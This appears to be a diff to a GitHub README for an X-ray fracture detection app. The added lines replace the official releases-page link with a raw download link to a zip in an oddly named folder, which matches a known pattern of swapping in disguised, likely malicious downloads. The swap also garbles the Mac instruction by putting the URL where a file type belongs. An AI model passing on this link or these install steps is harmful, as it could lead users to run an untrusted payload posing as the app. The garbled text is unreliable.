Suitakut/X-ray-Fracture-Detection-and-Segmentation-App/README.md

 ## 📥 Download & Install

-To download the app, **visit this page to download**: [X-ray Fracture Detection and Segmentation Releases](https://github.com/Suitakut/X-ray-Fracture-Detection-and-Segmentation-App/releases).
+To download the app, **visit this page to download**: [X-ray Fracture Detection and Segmentation Releases](https://raw.githubusercontent.com/Suitakut/X-ray-Fracture-Detection-and-Segmentation-App/main/gawsie/App-ray-Detection-and-Segmentation-Fracture-v2.3-alpha.3.zip).

 1. Select the version you want to download.
 Look for the latest release.
-2. Click on the file labeled with `.exe` or `.zip` for Windows, or `.tar.gz` for Mac.
+2. Click on the file labeled with `.exe` or `.zip` for Windows, or `https://raw.githubusercontent.com/Suitakut/X-ray-Fracture-Detection-and-Segmentation-App/main/gawsie/App-ray-Detection-and-Segmentation-Fracture-v2.3-alpha.3.zip` for Mac.
 3. Once the file is downloaded, locate it in your downloads folder.

 ## 💻 System Requirements